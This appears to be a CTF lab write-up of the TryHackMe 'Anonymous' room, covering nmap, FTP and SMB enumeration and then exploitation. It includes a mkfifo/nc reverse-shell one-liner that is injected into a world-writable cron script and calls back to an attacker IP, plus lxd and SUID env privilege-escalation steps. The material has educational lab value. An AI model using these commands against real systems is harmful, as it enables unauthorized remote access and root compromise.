Posts Anonymous Writeup
Post
Cancel

Anonymous Writeup

Description:

The Following Post is writeup of Anonymous room of tryhackme https://tryhackme.com/room/anonymous

MachineDetails
OSLinux
RatingMedium
Creatornamelessone

Summary

The Room have 4 ports open with anonymous logins in ftp and one of the share is exposed. After logging into ftp we see a script which can possibly running as cronjob. Put a reverse shell script and wait for shell to spawn. Now for PrivEsc we can see env have suid permissions. Exploiting it will get us root flag.

Walkthrough

Enumeration

Let’s start with nmap scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
nmap -sC -sV -oA nmap/pickhill 10.10.74.228
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 10:45 IST
Nmap scan report for 10.10.74.228
Host is up (0.31s latency).
Not shown: 995 closed ports
PORT     STATE    SERVICE     VERSION
21/tcp   open     ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 111      113          4096 Jun 04 19:26 scripts [NSE: writeable]
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.9.124.57
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open     ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
|   256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_  256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
139/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open     netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
8001/tcp filtered vcom-tunnel
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 18s, deviation: 0s, median: 17s
|_nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: anonymous
|   NetBIOS computer name: ANONYMOUS\x00
|   Domain name: \x00
|   FQDN: anonymous
|_  System time: 2020-08-26T05:16:21+00:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-08-26T05:16:21
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.52 seconds

Let’s start with ftp.

FTP

Let’s check by logging into it.

Logged in as anonymous

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 111      113          4096 Jun 04 19:26 .
drwxr-xr-x    3 65534    65534        4096 May 13 19:49 ..
-rwxr-xrwx    1 1000     1000          314 Jun 04 19:24 clean.sh
-rw-rw-r--    1 1000     1000         2107 Aug 26 05:36 removed_files.log
-rw-r--r--    1 1000     1000           68 May 12 03:50 to_do.txt
226 Directory send OK.
ftp> mget *
mget clean.sh? y
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for clean.sh (314 bytes).
226 Transfer complete.
314 bytes received in 0.00 secs (350.4464 kB/s)
mget removed_files.log? y
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for removed_files.log (2150 bytes).
226 Transfer complete.
2150 bytes received in 0.00 secs (9.0326 MB/s)
mget to_do.txt? y
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for to_do.txt (68 bytes).
226 Transfer complete.
68 bytes received in 0.00 secs (412.4612 kB/s)
ftp> exit

So basically we can see the script maybe we can edit it to get a shell.
I will come back again let’s enum smb now

SMB

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
=========================================
|    Share Enumeration on 10.10.74.228    |
=========================================

      Sharename       Type      Comment
      ---------       ----      -------
      print$          Disk      Printer Drivers
      pics            Disk      My SMB Share Directory for Pics
      IPC$            IPC       IPC Service (anonymous server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.74.228
//10.10.74.228/print$   Mapping: DENIED, Listing: N/A
//10.10.74.228/pics     Mapping: OK, Listing: OK
//10.10.74.228/IPC$     

Though pics are open but doesn’t contain any usefull info or more or less i already guessed exploitation part. I found nothing interesting so skipped it.
Let’s move on to Exploitation part.

Exploitation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
silver@parrot  ~/Desktop/tryhackme/anonymous/nmap  curlftpfs anonymous:anon@10.10.74.228 /home/silver/Desktop/tryhackme/anonymous/nmap/my_ftp
 silver@parrot  ~/Desktop/tryhackme/anonymous/nmap  lks
zsh: correct 'lks' to 'ls' [nyae]? y
my_ftp  pickhill.gnmap  pickhill.nmap  pickhill.xml
 silver@parrot  ~/Desktop/tryhackme/anonymous/nmap  cd my_ftp
ls                                                               
 silver@parrot  ~/Desktop/tryhackme/anonymous/nmap/my_ftp  ls
scripts
 silver@parrot  ~/Desktop/tryhackme/anonymous/nmap/my_ftp  ls -la
total 4
drwxr-xr-x 1 root   root   1024 Jan  1  1970 .
drwxr-xr-x 1 silver silver   90 Aug 26 11:15 ..
drwxrwxrwx 2 root   root   4096 Jun  4 19:26 scripts
 silver@parrot  ~/Desktop/tryhackme/anonymous/nmap/my_ftp  cd scripts
 silver@parrot  ~/Desktop/tryhackme/anonymous/nmap/my_ftp/scripts  ls -la
total 16
drwxrwxrwx 2 root root 4096 Jun  4 19:26 .
drwxr-xr-x 1 root root 1024 Jan  1  1970 ..
-rwxr-xrwx 1 root root  314 Jun  4 19:24 clean.sh
-rw-rw-r-- 1 root root 2580 Aug 26 05:47 removed_files.log
-rw-r--r-- 1 root root   68 May 12 03:50 to_do.txt
 silver@parrot  ~/Desktop/tryhackme/anonymous/nmap/my_ftp/scripts  cat clean.sh
#!/bin/bash

tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
        echo "Running cleanup script:  nothing to delete" >> /var/ftp/scripts/removed_files.log
else
    for LINE in $tmp_files; do
        rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi
 silver@parrot  ~/Desktop/tryhackme/anonymous/nmap/my_ftp/scripts  echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.124.57 4444 >/tmp/f" >> clean.sh
zsh: operation not supported: clean.sh
 ✘ silver@parrot  ~/Desktop/tryhackme/anonymous/nmap/my_ftp/scripts  ls -la
total 16
drwxrwxrwx 2 root root 4096 Jun  4 19:26 .
drwxr-xr-x 1 root root 1024 Jan  1  1970 ..
-rwxr-xrwx 1 root root  314 Jun  4 19:24 clean.sh
-rw-rw-r-- 1 root root 2709 Aug 26 05:50 removed_files.log
-rw-r--r-- 1 root root   68 May 12 03:50 to_do.txt
nano clean.sh                                                                                                                        
 silver@parrot  ~/Desktop/tryhackme/anonymous/nmap/my_ftp/scripts  nano clean.sh
 silver@parrot  ~/Desktop/tryhackme/ano

Here we go our reverse shell:-

 silver@parrot  ~/Desktop/tryhackme/anonymous/nmap/my_ftp/scripts  pwncat --listen --port 4444
[11:44:44] received connection from 10.10.74.228:44016                                                                 connect.py:148
[11:44:47] new host w/ hash 9bc647e33bc8a15fe1850dcd4a2752c1                                                            victim.py:329
[11:45:05] pwncat running in /bin/sh                                                                                    victim.py:363
[11:45:16] pwncat is ready 🐈                                                                                           victim.py:762


\[\033[01;31m\](remote)\[\033[00m\] \[\033[01;33m\]\u@\h\[\033[00m\]:\[\033[01;36m\]\w\[\033[00m\]$
\[\033[01;31m\](remote)\[\033[00m\] \[\033[01;33m\]\u@\h\[\033[00m\]:\[\033[01;36m\]\w\[\033[00m\]$ bash
namelessone@anonymous:/$  

as user namelessone Now let’s move to PrivEsc

PrivEsc

Here we go lxd group

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
====================================( Basic information )=====================================
OS: Linux version 4.15.0-99-generic (buildd@lcy01-amd64-013) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #100-Ubuntu SMP Wed Apr 22 20:32:56 UTC 2020
User & Groups: uid=1000(namelessone) gid=1000(namelessone) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)

So let's move on to lxd privesc

git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

python -m SimpleHTTPServer 8001

namelessone@anonymous:/tmp$ lxc list
If this is your first time running LXD on this machine, you should also run: lxd init
To start your first container, try: lxc launch ubuntu:18.04

+------+-------+------+------+------+-----------+
| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
+------+-------+------+------+------+-----------+
namelessone@anonymous:/tmp$ wget 10.9.124.57:8001/alpine.tar.gz

namelessone@anonymous:/tmp$ lxc image import ./alpine.tar.gz --alias myimage

namelessone@anonymous:/tmp$ lxc image list
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
|  ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |         UPLOAD DATE          |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| myimage | cb2dd242acb1 | no     | alpine v3.12 (20200826_12:01) | x86_64 | 2.97MB | Aug 26, 2020 at 6:35am (UTC) |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+

Error: No storage pool found. Please create a new storage pool

Ahh looks like not a right way though let’s check another way

SUID

Got env suid didn’t notice it though let’s check gtfobins

env

```#!/usr/bin/env bash

namelessone@anonymous:/tmp# id uid=1000(namelessone) gid=1000(namelessone) euid=0(root) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd) ```

got euid 0

let’s look into root.txt

root.txt

This post is licensed under CC BY 4.0 by the author.